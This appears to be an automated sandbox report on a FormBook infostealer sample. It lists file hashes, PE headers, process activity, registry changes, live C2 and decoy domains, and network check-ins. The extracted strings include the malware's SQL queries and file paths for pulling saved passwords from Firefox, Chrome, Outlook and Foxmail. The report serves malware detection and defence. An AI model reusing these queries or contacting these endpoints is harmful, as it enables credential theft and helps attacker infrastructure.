File name: | SecuriteInfo.com.Win32.TrojanX-gen.9468.18275 |
Full analysis: | https://app.any.run/tasks/d580b0f6-9f8b-4072-8afd-362970b03700 |
Verdict: | Malicious activity |
Threats: | FormBook is a data stealer that is being distributed as a MaaS. FormBook differs from a lot of competing malware by its extreme ease of use that allows even the unexperienced threat actors to use FormBook virus. |
Analysis date: | December 05, 2022, 18:34:44 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/x-dosexec |
File info: | PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows |
MD5: | 59EC68C614CBD08F061B98EE2F7558B6 |
SHA1: | 518E36C73B44331E89A74C651DDF64E9AD79EE10 |
SHA256: | 1546E632CB3CD6ABB0497A1E941D7C1AFEFD3D1BC7582B63F49D948241406B80 |
SSDEEP: | 6144:ptxBKhzEHZ6pqRMVr5PdD1IQnAPJrueL9KEzbIgsfd+O2hht9lKSYS:ptLKhIZ60+VrVR/UJrueL9PbcV8jt9lH |
.dll | | | Win32 Dynamic Link Library (generic) (38.3) |
---|---|---|
.exe | | | Win32 Executable (generic) (26.2) |
.exe | | | Win16/32 Executable Delphi generic (12) |
.exe | | | Generic Win/DOS Executable (11.6) |
.exe | | | DOS Executable Generic (11.6) |
Architecture: | IMAGE_FILE_MACHINE_I386 |
---|---|
Subsystem: | IMAGE_SUBSYSTEM_WINDOWS_GUI |
Compilation Date: | 2103-Nov-18 21:46:25 |
Debug artifacts: |
|
Comments: | - |
CompanyName: | - |
FileDescription: | HNIOPLN |
FileVersion: | 1.0.0.0 |
InternalName: | HNIOPLN.exe |
LegalCopyright: | Copyright © 2022 |
LegalTrademarks: | - |
OriginalFilename: | HNIOPLN.exe |
ProductName: | HNIOPLN |
ProductVersion: | 1.0.0.0 |
Assembly Version: | 1.0.0.0 |
e_magic: | MZ |
---|---|
e_cblp: | 144 |
e_cp: | 3 |
e_crlc: | - |
e_cparhdr: | 4 |
e_minalloc: | - |
e_maxalloc: | 65535 |
e_ss: | - |
e_sp: | 184 |
e_csum: | - |
e_ip: | - |
e_cs: | - |
e_ovno: | - |
e_oemid: | - |
e_oeminfo: | - |
e_lfanew: | 128 |
Signature: | PE |
---|---|
Machine: | IMAGE_FILE_MACHINE_I386 |
NumberofSections: | 5 |
TimeDateStamp: | 2103-Nov-18 21:46:25 |
PointerToSymbolTable: | - |
NumberOfSymbols: | - |
SizeOfOptionalHeader: | 224 |
Characteristics: |
|
Name | Virtual Address | Virtual Size | Raw Size | Charateristics | Entropy |
---|---|---|---|---|---|
X\x166F)"#\x19 | 8192 | 285236 | 285696 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 7.99936 |
.text | 294912 | 42028 | 42496 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ | 5.06849 |
.rsrc | 344064 | 5858 | 6144 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 4.35264 |
Section_4 | 352256 | 16 | 512 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ | 0.122276 |
.reloc | 360448 | 12 | 512 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ | 0.0980042 |
Title | Entropy | Size | Codepage | Language | Type |
---|---|---|---|---|---|
1 | 4.15503 | 4264 | UNKNOWN | UNKNOWN | RT_ICON |
32512 | 1.7815 | 20 | UNKNOWN | UNKNOWN | RT_GROUP_ICON |
1 (#2) | 3.27039 | 780 | UNKNOWN | UNKNOWN | RT_VERSION |
1 (#3) | 5.00112 | 490 | UNKNOWN | UNKNOWN | RT_MANIFEST |
mscoree.dll |
PID | CMD | Path | Indicators | Parent process | |||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2628 | "C:\Users\admin\AppData\Local\Temp\SecuriteInfo.com.Win32.TrojanX-gen.9468.18275.exe" | C:\Users\admin\AppData\Local\Temp\SecuriteInfo.com.Win32.TrojanX-gen.9468.18275.exe | — | Explorer.EXE | |||||||||||
User: admin Integrity Level: MEDIUM Description: HNIOPLN Exit code: 0 Version: 1.0.0.0 Modules
| |||||||||||||||
3908 | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | — | SecuriteInfo.com.Win32.TrojanX-gen.9468.18275.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft .NET Services Installation Utility Exit code: 0 Version: 4.0.30319.34209 built by: FX452RTMGDR Modules
| |||||||||||||||
2752 | "C:\Windows\System32\services.exe" | C:\Windows\System32\services.exe | Explorer.EXE | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Services and Controller app Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
Formbook(PID) Process(2752) services.exe C2www.needook.com/4u5a/ Strings (75)USERNAME LOCALAPPDATA USERPROFILE APPDATA TEMP ProgramFiles CommonProgramFiles ALLUSERSPROFILE /c copy " /c del " \Run \Policies \Explorer \Registry\User \Registry\Machine \SOFTWARE\Microsoft\Windows\CurrentVersion Office\15.0\Outlook\Profiles\Outlook\ NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ \SOFTWARE\Mozilla\Mozilla \Mozilla Username: Password: formSubmitURL usernameField encryptedUsername encryptedPassword \logins.json \signons.sqlite \Mail\ \Foxmail \Storage\ \Accounts\Account.rec0 \Data\AccCfg\Accounts.tdat \Microsoft\Vault\ SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins \Google\Chrome\User Data\Default\Login Data SELECT origin_url, username_value, password_value FROM logins .exe .com .scr .pif .cmd .bat ms win gdi mfc vga igfx user help config update regsvc chkdsk Cookies SeDebugPrivilege SeShutdownPrivilege \BaseNamedObjects config.php POST HTTP/1.1 Host: Connection: close Content-Length: Cache-Control: no-cache Origin: http:// User-Agent: Mozilla Firefox/4.0 Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http:// Accept-Language: en-US Accept-Encoding: gzip, deflate
dat= f-start f-end Decoy C2 (64)wp-operator.online openhardware.farm nu2uresale.store tefalito.store maximumercrefund.com bestcolonia.club zhuanxiandai.com www460.vip smartturflawncare.com pollicino.online re-curve.tech michari.com 33344.cyou marketmall.digital estacatemucocautin.com dersameh.com fangzizhuangxiu47.com lee-perez.com nekutenti.com medhatkouta.com jhfgroups.com shopcheap.club bjrkfw.com tommy57.shop anniistore.com ope-cctv.com 05hc.com y31jaihdb6zm87.buzz easydaw.app www659123.com suppq.top thebrotherhood.shop videosrunman.com powerscoumembers.com lodehewulan.yachts festpay.pro zhukojobs.com www64421.com jxily.com 700544.com skechersofferte.com uloggers.com yt82ra5c.com kaylastjean.com nyameci.com talisian.com api2022.top darkchocolatebliss.com mcarmen.info kasslot.com stublan.com uknowmarket.com cpitherapy.com agikdnjs.com canadianlocalbusiness.com dkc010.com cardgloo.com fuzulyapigyo.xyz steves.properties guaiguaimao188.com cityasset.net burcinyilmaz.com inhibit09.online olanger.email (PID) Process(2752) services.exe C2www.needook.com/4u5a/ Strings (75)USERNAME LOCALAPPDATA USERPROFILE APPDATA TEMP ProgramFiles CommonProgramFiles ALLUSERSPROFILE /c copy " /c del " \Run \Policies \Explorer \Registry\User \Registry\Machine \SOFTWARE\Microsoft\Windows\CurrentVersion Office\15.0\Outlook\Profiles\Outlook\ NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ \SOFTWARE\Mozilla\Mozilla \Mozilla Username: Password: formSubmitURL usernameField encryptedUsername encryptedPassword \logins.json \signons.sqlite \Mail\ \Foxmail \Storage\ \Accounts\Account.rec0 \Data\AccCfg\Accounts.tdat \Microsoft\Vault\ SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins \Google\Chrome\User Data\Default\Login Data SELECT origin_url, username_value, password_value FROM logins .exe .com .scr .pif .cmd .bat ms win gdi mfc vga igfx user help config update regsvc chkdsk Cookies SeDebugPrivilege SeShutdownPrivilege \BaseNamedObjects config.php POST HTTP/1.1 Host: Connection: close Content-Length: Cache-Control: no-cache Origin: http:// User-Agent: Mozilla Firefox/4.0 Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http:// Accept-Language: en-US Accept-Encoding: gzip, deflate
dat= f-start f-end Decoy C2 (64)Y9HWoINcPu0r7SSSKt4FCmk7 G/E64auYdhRQM4wZW2bcOaY= bL57APty/StRpW49a+EdxA== TppryJ0SoslHe8gJFVc= HXxDShYIEcUJDahdv2nvl5Hlbp4= EKaq5c6w0nV3WWlEqM4Www== VM+YjE8XS1OLcH1roYF4zA== OwK0wxmBGnq2Fg== B1zy4bulyfY9tj9DK2eIkeYArpTt Avj5JeA8m9girqfQ4+cZxA== AOY4dmDFkCdX8HUJMw== 5cQUw3pPMYr07V8= P7ZsN4/zt63AEw== FYyVCOpB8Vl//kSkDLPo91Yy jxwZTBp+5gcsccPxDF+K4bDG2Rpp0A== iGx9AO58DRhZbXX9 prwVyLkAtlhSU6irmansg8wArpTt uqa8ZPl+FFObOkdFNg== tL4OhF22EDaEOkdFNg== 6exH76Z9o7eu/n86vgPE rJfvmmO0I0KSOkdFNg== fWeyPQpzFxdBSlPuAlA= imNhpGXCQjOgCw== KOLqYk7Qy278+j3g A4mLyKgkynW7jZZt0F8= 380eDrCm3ApZbXX9 1k6VTs/04X8= 6yQgD+RiKrbnhr77i60lI/gyAQ== rST4Evf891bSukI= wYh6yzBy3wDSOkdFNg== i0j/88JPuMOz 1t8w27cIepbAIqSh0G5dsiUnCw== uI6hQB6EIE+bFW1woYF4zA== BPL0Pin+82dmW/OhB0Fr5JHlbp4= XC5/ZktMXzEnk+xGrPFSE+st srT4c1/AacoX8F0= zJeU2qIZ2VCSOkdFNg== j4a8RbuBvuFZbXX9 asVC+9b7w7eu L6UfqgNtQjOgCw== yTgIJt0+qNUilvojOWqqBypDFg== Ie006MzYHidZbXX9 fbVjId1kpfdZbXX9 w7z+dzqeJEZq2/A6vgPE bkyOQjI+MYr07V8= EODzbkTAOSJZbXX9 sZXWleMz4n7HrUI= YuK38tZjKZ3eQJnC3jxvdM7D2Rpp0A== VTJSAfJU7tISaHT/ d/gIXE8qLIr07V8= F3XypWdIKor07V8= uQaJTBhc8R4kr/I6vgPE 1T8ENSkKJLudaZZt0F8= uc4eyKuvBidZbXX9 txCp1rM0oc4LhQHpKYJQUKKktIT3GWoNJw== RMLQh/ZpQjOgCw== 0+Qt17zBCyNZbXX9 JC6jMCHmB77Eu/EFdap62w== t4XGRQqC3kSB9Tpds2j0Wrg= T7hCMhTkzX2mf4lVAQjjJOgz DQ6VYEicGU+NFio7Lw== PCpjzoTZU3Ol9T1coYF4zA== DxVl5Jum/t5orqfQ4+cZxA== OaM0F9KunPxoQUk/Nw== (PID) Process(2752) services.exe C2www.needook.com/4u5a/ Strings (75)USERNAME LOCALAPPDATA USERPROFILE APPDATA TEMP ProgramFiles CommonProgramFiles ALLUSERSPROFILE /c copy " /c del " \Run \Policies \Explorer \Registry\User \Registry\Machine \SOFTWARE\Microsoft\Windows\CurrentVersion Office\15.0\Outlook\Profiles\Outlook\ NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ \SOFTWARE\Mozilla\Mozilla \Mozilla Username: Password: formSubmitURL usernameField encryptedUsername encryptedPassword \logins.json \signons.sqlite \Mail\ \Foxmail \Storage\ \Accounts\Account.rec0 \Data\AccCfg\Accounts.tdat \Microsoft\Vault\ SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins \Google\Chrome\User Data\Default\Login Data SELECT origin_url, username_value, password_value FROM logins .exe .com .scr .pif .cmd .bat ms win gdi mfc vga igfx user help config update regsvc chkdsk Cookies SeDebugPrivilege SeShutdownPrivilege \BaseNamedObjects config.php POST HTTP/1.1 Host: Connection: close Content-Length: Cache-Control: no-cache Origin: http:// User-Agent: Mozilla Firefox/4.0 Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http:// Accept-Language: en-US Accept-Encoding: gzip, deflate
dat= f-start f-end Decoy C2 (64)wp-operator.online openhardware.farm nu2uresale.store tefalito.store maximumercrefund.com bestcolonia.club zhuanxiandai.com www460.vip smartturflawncare.com pollicino.online re-curve.tech michari.com 33344.cyou marketmall.digital estacatemucocautin.com dersameh.com fangzizhuangxiu47.com lee-perez.com nekutenti.com medhatkouta.com jhfgroups.com shopcheap.club bjrkfw.com tommy57.shop anniistore.com ope-cctv.com 05hc.com y31jaihdb6zm87.buzz easydaw.app www659123.com suppq.top thebrotherhood.shop videosrunman.com powerscoumembers.com lodehewulan.yachts festpay.pro zhukojobs.com www64421.com jxily.com 700544.com skechersofferte.com uloggers.com yt82ra5c.com kaylastjean.com nyameci.com talisian.com api2022.top darkchocolatebliss.com mcarmen.info kasslot.com stublan.com uknowmarket.com cpitherapy.com agikdnjs.com canadianlocalbusiness.com dkc010.com cardgloo.com fuzulyapigyo.xyz steves.properties guaiguaimao188.com cityasset.net burcinyilmaz.com inhibit09.online olanger.email | |||||||||||||||
576 | C:\Windows\Explorer.EXE | C:\Windows\Explorer.EXE | — | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Explorer Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
3428 | "C:\Program Files\Mozilla Firefox\Firefox.exe" | C:\Program Files\Mozilla Firefox\Firefox.exe | — | services.exe | |||||||||||
User: admin Company: Mozilla Corporation Integrity Level: MEDIUM Description: Firefox Exit code: 0 Version: 83.0 Modules
|
(PID) Process: | (2752) services.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content |
Operation: | write | Name: | CachePrefix |
Value: | |||
(PID) Process: | (2752) services.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies |
Operation: | write | Name: | CachePrefix |
Value: Cookie: | |||
(PID) Process: | (2752) services.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History |
Operation: | write | Name: | CachePrefix |
Value: Visited: | |||
(PID) Process: | (2752) services.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
(PID) Process: | (2752) services.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | IntranetName |
Value: 1 | |||
(PID) Process: | (2752) services.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
(PID) Process: | (2752) services.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | AutoDetect |
Value: 0 | |||
(PID) Process: | (2752) services.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings |
Operation: | write | Name: | ProxyEnable |
Value: 0 | |||
(PID) Process: | (2752) services.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections |
Operation: | write | Name: | SavedLegacySettings |
Value: 460000003B010000090000000000000000000000000000000400000000000000C0E333BBEAB1D3010000000000000000000000000100000002000000C0A80164000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | |||
(PID) Process: | (2752) services.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{362E934C-743B-4588-8259-D2482DB771A8} |
Operation: | write | Name: | WpadDecisionReason |
Value: 1 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2752 | services.exe | C:\Users\admin\AppData\Local\Temp\1--Lt08NN | sqlite | |
MD5:CC104C4E4E904C3AD7AD5C45FBFA7087 | SHA256:321BE844CECC903EF1E7F875B729C96BB3ED0D4986314384CD5944A29A670C9B | |||
2752 | services.exe | C:\Users\admin\AppData\Local\Temp\sqlite3.def | text | |
MD5:DE71633DE073966EB5D5F787EAC989BB | SHA256:C810A7589A228352269413CC503647DF82B4320B7C0B596A15D2842DAC7F843A | |||
2752 | services.exe | C:\Users\admin\AppData\Local\Temp\9ratq.zip | compressed | |
MD5:16F94AEE2D9A53BF8E58722679063051 | SHA256:43A12CC1C155D0BB9686A1FCBC90BABC9E99DBEC475BDDC2ACACF31BD2B159E8 | |||
2752 | services.exe | C:\Users\admin\AppData\Local\Temp\sqlite3.dll | executable | |
MD5:EDA40EA55FF2EB2A2E5ACA836BB1CC26 | SHA256:330B88EACB778B86DFF1A90189121E8B3280723BE9FBF4E55174EDE2BBF74AF0 | |||
2752 | services.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\78RFYB7Z\sqlite-dll-win32-x86-3150000[1].zip | compressed | |
MD5:16F94AEE2D9A53BF8E58722679063051 | SHA256:43A12CC1C155D0BB9686A1FCBC90BABC9E99DBEC475BDDC2ACACF31BD2B159E8 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
576 | Explorer.EXE | POST | — | 94.23.162.163:80 | http://www.darkchocolatebliss.com/4u5a/ | DE | — | — | malicious |
576 | Explorer.EXE | POST | — | 94.23.162.163:80 | http://www.darkchocolatebliss.com/4u5a/ | DE | — | — | malicious |
576 | Explorer.EXE | POST | — | 94.23.162.163:80 | http://www.darkchocolatebliss.com/4u5a/ | DE | — | — | malicious |
576 | Explorer.EXE | POST | — | 94.23.162.163:80 | http://www.darkchocolatebliss.com/4u5a/ | DE | — | — | malicious |
576 | Explorer.EXE | POST | — | 94.23.162.163:80 | http://www.darkchocolatebliss.com/4u5a/ | DE | — | — | malicious |
576 | Explorer.EXE | POST | 404 | 162.213.255.142:80 | http://www.marketmall.digital/4u5a/ | US | html | 1.05 Kb | malicious |
576 | Explorer.EXE | POST | 404 | 162.213.255.142:80 | http://www.marketmall.digital/4u5a/ | US | html | 1.05 Kb | malicious |
576 | Explorer.EXE | GET | 404 | 94.23.162.163:80 | http://www.darkchocolatebliss.com/4u5a/?mJwHH0=pzMeEw2CLp9onsoEnDSOmc3gtX7SiKwXMIcMx0e8RMBYp3cHCqEf60/KvimOIvjijeVfzZ3ezI4K2kicxXlHHzx6auYw36b3X9e1iLc=&4h=I29L_rMXcnyh | DE | html | 178 b | malicious |
576 | Explorer.EXE | GET | 404 | 38.55.236.89:80 | http://www.ope-cctv.com/4u5a/?mJwHH0=PpVjBZYmN65mN/CchdVCVsAoBpQ31OdI4sTzWlpX/jy1IrupfQnybysg8dMB5QjWo1YH+L33UlhflMYe95+OODsslcem/VRP4QLmUg0=&4h=I29L_rMXcnyh | US | html | 146 b | malicious |
576 | Explorer.EXE | POST | 405 | 89.31.143.1:80 | http://www.dersameh.com/4u5a/ | DE | html | 150 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2752 | services.exe | 45.33.6.223:80 | www.sqlite.org | Linode, LLC | US | suspicious |
576 | Explorer.EXE | 89.31.143.1:80 | www.dersameh.com | IP Exchange GmbH | DE | malicious |
576 | Explorer.EXE | 38.55.236.89:80 | www.ope-cctv.com | STARCLOUD GLOBAL PTE., LTD. | US | malicious |
576 | Explorer.EXE | 94.23.162.163:80 | www.darkchocolatebliss.com | OVH SAS | DE | malicious |
— | — | 94.23.162.163:80 | www.darkchocolatebliss.com | OVH SAS | DE | malicious |
576 | Explorer.EXE | 154.209.6.241:80 | www.y31jaihdb6zm87.buzz | YISU CLOUD LTD | HK | malicious |
576 | Explorer.EXE | 162.213.255.142:80 | www.marketmall.digital | NAMECHEAP-NET | US | malicious |
Domain | IP | Reputation |
---|---|---|
www.ope-cctv.com |
| malicious |
www.sqlite.org |
| whitelisted |
www.dersameh.com |
| malicious |
www.darkchocolatebliss.com |
| malicious |
www.y31jaihdb6zm87.buzz |
| malicious |
www.marketmall.digital |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
576 | Explorer.EXE | Generic Protocol Command Decode | SURICATA HTTP Unexpected Request body |
576 | Explorer.EXE | A Network Trojan was detected | ET TROJAN FormBook CnC Checkin (GET) |
576 | Explorer.EXE | A Network Trojan was detected | ET TROJAN FormBook CnC Checkin (GET) |
576 | Explorer.EXE | A Network Trojan was detected | ET TROJAN FormBook CnC Checkin (GET) |
576 | Explorer.EXE | Generic Protocol Command Decode | SURICATA HTTP Unexpected Request body |
576 | Explorer.EXE | Generic Protocol Command Decode | SURICATA HTTP Unexpected Request body |
— | — | Generic Protocol Command Decode | SURICATA HTTP Unexpected Request body |
576 | Explorer.EXE | Generic Protocol Command Decode | SURICATA HTTP Unexpected Request body |
576 | Explorer.EXE | Generic Protocol Command Decode | SURICATA HTTP Unexpected Request body |
576 | Explorer.EXE | A Network Trojan was detected | ET TROJAN FormBook CnC Checkin (POST) M2 |